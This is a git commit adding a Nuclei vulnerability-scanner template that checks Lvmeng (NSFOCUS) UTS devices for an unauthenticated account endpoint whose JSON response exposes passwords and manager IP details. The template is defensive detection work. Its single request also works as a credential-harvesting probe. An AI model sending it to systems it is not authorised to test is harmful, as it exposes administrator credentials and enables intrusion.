Create lvmeng-uts-disclosure.yaml
parent
adb9bcfd0c
commit
01b729237d
|
@ -0,0 +1,31 @@
|
|||
id: lvmeng-uts-disclosure
|
||||
|
||||
info:
|
||||
name: Lvmeng UTS Disclosure
|
||||
author: pikpikcu
|
||||
severity: info
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/webapi/v1/system/accountmanage/account"
|
||||
headers:
|
||||
Content-Type: application/json
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "application/json"
|
||||
condition: and
|
||||
part: header
|
||||
- type: word
|
||||
words:
|
||||
- "password"
|
||||
- "nsfocus_uts"
|
||||
- "MANAGER_IP"
|
||||
condition: and
|
||||
part: body
|
Loading…
Reference in New Issue